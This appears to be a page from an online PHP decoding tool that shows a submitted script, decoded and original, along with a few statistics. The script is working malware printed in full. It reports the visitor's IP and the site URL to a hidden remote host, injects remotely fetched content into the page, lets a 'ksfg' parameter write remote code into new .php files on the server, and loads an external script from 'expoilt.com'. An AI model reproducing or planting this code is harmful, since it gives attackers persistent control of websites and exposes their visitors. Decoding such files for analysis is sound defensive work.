Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function GetIP() { if (getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTT..
Decoded Output download
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP")) {
$ip = getenv("HTTP_CLIENT_IP");
} elseif (getenv("HTTP_X_FORWARDED_FOR")) {
$ip = getenv("HTTP_X_FORWARDED_FOR");
if (strstr($ip, ',')) {
$tmp = explode(',', $ip);
$ip = trim($tmp[0]);
}
} else {
$ip = getenv("REMOTE_ADDR");
}
return $ip;
}
$x = base64_decode('aHR0cHM6Ly93d3cudHJpYnVubmV3cy5jb20=') . GetIP() . '-' . base64_encode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
if (function_exists('curl_init')) {
$ch = @curl_init();
curl_setopt($ch, CURLOPT_URL, $x);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$gitt = curl_exec($ch);
curl_close($ch);
if ($gitt == false) {
@$gitt = file_get_contents($x);
}
} elseif (function_exists('file_get_contents')) {
@$gitt = file_get_contents($x);
}
?><?php
error_reporting(0);
$s = 'https://tribunnews.com';
$host = str_replace('www.', '', @$_SERVER['HTTP_HOST']);
// $x = $s.'l-'.base64_encode($host);
$x = $s . '/index.php';
// echo $host;
if (function_exists('curl_init')) {
$ch = @curl_init();
curl_setopt($ch, CURLOPT_URL, $x);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$gitt = curl_exec($ch);
curl_close($ch);
if ($gitt == false) {
@$gitt = file_get_contents($x);
}
} elseif (function_exists('file_get_contents')) {
@$gitt = file_get_contents($x);
}
echo $gitt;
if (isset($_GET['ksfg'])) {
$f = fopen($_GET['ksfg'] . '.php', 'a');
fwrite($f, file_get_contents($s . 's-' . $_GET['ksfg']));
fclose($f);
}
echo '<!DOCTYPE html!>';
?>
</marquee>
<script src=http://expoilt.com/ccb.js></script>
Did this file decode correctly?
Original Code
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP")) {
$ip = getenv("HTTP_CLIENT_IP");
} elseif (getenv("HTTP_X_FORWARDED_FOR")) {
$ip = getenv("HTTP_X_FORWARDED_FOR");
if (strstr($ip, ',')) {
$tmp = explode(',', $ip);
$ip = trim($tmp[0]);
}
} else {
$ip = getenv("REMOTE_ADDR");
}
return $ip;
}
$x = base64_decode('aHR0cHM6Ly93d3cudHJpYnVubmV3cy5jb20=') . GetIP() . '-' . base64_encode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
if (function_exists('curl_init')) {
$ch = @curl_init();
curl_setopt($ch, CURLOPT_URL, $x);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$gitt = curl_exec($ch);
curl_close($ch);
if ($gitt == false) {
@$gitt = file_get_contents($x);
}
} elseif (function_exists('file_get_contents')) {
@$gitt = file_get_contents($x);
}
?><?php
error_reporting(0);
$s = 'https://tribunnews.com';
$host = str_replace('www.', '', @$_SERVER['HTTP_HOST']);
// $x = $s.'l-'.base64_encode($host);
$x = $s . '/index.php';
// echo $host;
if (function_exists('curl_init')) {
$ch = @curl_init();
curl_setopt($ch, CURLOPT_URL, $x);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$gitt = curl_exec($ch);
curl_close($ch);
if ($gitt == false) {
@$gitt = file_get_contents($x);
}
} elseif (function_exists('file_get_contents')) {
@$gitt = file_get_contents($x);
}
echo $gitt;
if (isset($_GET['ksfg'])) {
$f = fopen($_GET['ksfg'] . '.php', 'a');
fwrite($f, file_get_contents($s . 's-' . $_GET['ksfg']));
fclose($f);
}
echo '<!DOCTYPE html!>';
?>
</marquee>
<script src=http://expoilt.com/ccb.js></script>
Function Calls
GetIP | 1 |
getenv | 1 |
base64_decode | 1 |
Stats
MD5 | 07ba6160cd0a9b08aeecb97d47512b3b |
Eval Count | 0 |
Decode Time | 70 ms |